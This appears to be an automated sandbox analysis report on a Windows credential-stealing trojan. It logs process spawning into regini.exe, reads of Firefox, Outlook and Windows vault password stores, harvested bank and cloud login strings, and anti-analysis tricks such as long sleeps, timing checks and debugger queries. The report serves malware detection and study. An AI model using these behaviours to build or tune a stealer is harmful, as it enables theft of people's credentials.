                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036407707_2_03640770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036647507_2_03664750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0363C7C07_2_0363C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365C6E07_2_0365C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036405357_2_03640535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_037005917_2_03700591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F24467_2_036F2446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E44207_2_036E4420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036EE4F67_2_036EE4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FAB407_2_036FAB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F6BD77_2_036F6BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0363EA807_2_0363EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036569627_2_03656962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036429A07_2_036429A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0370A9A67_2_0370A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364A8407_2_0364A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036428407_2_03642840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0366E8F07_2_0366E8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036268B87_2_036268B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B4F407_2_036B4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03682F287_2_03682F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03660F307_2_03660F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E2F307_2_036E2F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364CFE07_2_0364CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03632FC87_2_03632FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036BEFA07_2_036BEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03640E597_2_03640E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FEE267_2_036FEE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FEEDB7_2_036FEEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03652E907_2_03652E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FCE937_2_036FCE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364AD007_2_0364AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DCD1F7_2_036DCD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0363ADE07_2_0363ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03658DBF7_2_03658DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03640C007_2_03640C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03630CF27_2_03630CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E0CB57_2_036E0CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0362D34C7_2_0362D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F132D7_2_036F132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0368739A7_2_0368739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E12ED7_2_036E12ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365B2C07_2_0365B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036452A07_2_036452A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0367516C7_2_0367516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0362F1727_2_0362F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0370B16B7_2_0370B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364B1B07_2_0364B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F70E97_2_036F70E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FF0E07_2_036FF0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036EF0CC7_2_036EF0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036470C07_2_036470C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FF7B07_2_036FF7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F16CC7_2_036F16CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F75717_2_036F7571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DD5B07_2_036DD5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036314607_2_03631460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FF43F7_2_036FF43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFB767_2_036FFB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B5BF07_2_036B5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0367DBF97_2_0367DBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365FB807_2_0365FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B3A6C7_2_036B3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFA497_2_036FFA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F7A467_2_036F7A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036EDAC67_2_036EDAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DDAAC7_2_036DDAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03685AA07_2_03685AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E1AA37_2_036E1AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036499507_2_03649950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365B9507_2_0365B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036D59107_2_036D5910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036AD8007_2_036AD800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036438E07_2_036438E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFF097_2_036FFF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFFB17_2_036FFFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03641F927_2_03641F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03649EB07_2_03649EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F7D737_2_036F7D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03643D407_2_03643D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F1D5A7_2_036F1D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0365FDC07_2_0365FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036B9C327_2_036B9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FFCF27_2_036FFCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E120407_2_02E12040
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0CF107_2_02E0CF10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0B2607_2_02E0B260
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0B2547_2_02E0B254
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0D1307_2_02E0D130
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E0B1107_2_02E0B110
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E156F07_2_02E156F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E138EB7_2_02E138EB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E138F07_2_02E138F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E2BCE07_2_02E2BCE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395E2777_2_0395E277
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395D6D87_2_0395D6D8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0395E60C7_2_0395E60C
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 0362B970 appears 280 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03687E54 appears 102 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 015C5130 appears 58 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 0160F290 appears 105 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 015FEA12 appears 86 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 0157B970 appears 280 times
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: String function: 015D7E54 appears 102 times
                Source: BcF3o0Egke.exe, 00000000.00000002.2242593729.0000000004EE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2245210352.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2239473750.0000000003539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2239473750.0000000003539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000000.2074263028.000000000015A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameGpHAn.exe> vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000000.00000002.2238343244.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000005.00000002.2441681061.000000000167D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameREGINI.EXEj% vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe Binary or memory string: OriginalFilenameGpHAn.exe> vs BcF3o0Egke.exe
                Source: BcF3o0Egke.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@10/10
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BcF3o0Egke.exe.log
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\regini.exe File created: C:\Users\user\AppData\Local\Temp\7046-nn1K
                Source: BcF3o0Egke.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: BcF3o0Egke.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: regini.exe, 00000007.00000002.3935086502.0000000003161000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2637354633.0000000003134000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3935086502.0000000003134000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3935086502.000000000313F000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2637247739.0000000003113000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BcF3o0Egke.exe Virustotal: Detection: 70%
                Source: BcF3o0Egke.exe ReversingLabs: Detection: 95%
                Source: unknown Process created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Process created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Process created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\regini.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: BcF3o0Egke.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BcF3o0Egke.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: BcF3o0Egke.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: GpHAn.pdb source: BcF3o0Egke.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ysdBLufRFxAq.exe, 00000006.00000000.2366003816.000000000070E000.00000002.00000001.01000000.0000000C.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2522895331.000000000070E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BcF3o0Egke.exe, BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: GpHAn.pdbSHA256 source: BcF3o0Egke.exe
                Source: Binary string: regini.pdb source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: BcF3o0Egke.exe; Static PE information: 0xB48F262A [Tue Dec 29 02:44:58 2065 UTC]
                Source: BcF3o0Egke.exe; Static PE information: section name: .text entropy: 6.961995643853877
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: BcF3o0Egke.exe PID: 432, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: BC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: 2530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: 4530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: 8880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: 73C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: 9880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Memory allocated: A880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Code function: 5_2_015C096E rdtsc 5_2_015C096E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\regini.exe; API coverage: 2.7 %
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe TID: 6352; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 6756; Thread sleep count: 41 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6756; Thread sleep time: -82000s >= -30000s
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe TID: 6760; Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe TID: 6760; Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe; Code function: 7_2_02E1C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_02E1C8D0
                Source: 7046-nn1K.7.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 7046-nn1K.7.dr; Binary or memory string: discord.comVMware20,11696428655f
                Source: 7046-nn1K.7.dr; Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: global block list test formVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 7046-nn1K.7.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 7046-nn1K.7.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 7046-nn1K.7.dr; Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 7046-nn1K.7.dr; Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 7046-nn1K.7.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: regini.exe, 00000007.00000002.3935086502.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2755260479.00000173B7E0C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 7046-nn1K.7.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 7046-nn1K.7.dr; Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 7046-nn1K.7.dr; Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 7046-nn1K.7.dr; Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 7046-nn1K.7.dr; Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: ysdBLufRFxAq.exe, 00000009.00000002.3935669937.00000000008DF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                Source: 7046-nn1K.7.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 7046-nn1K.7.dr; Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 7046-nn1K.7.dr; Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 7046-nn1K.7.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 7046-nn1K.7.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe; Process queried: DebugPort
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe; Code function: 5_2_00417A73 LdrLoadDll,5_2_00417A73
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F0 mov eax, dword ptr fs:[00000030h]5_2_0159E3F0
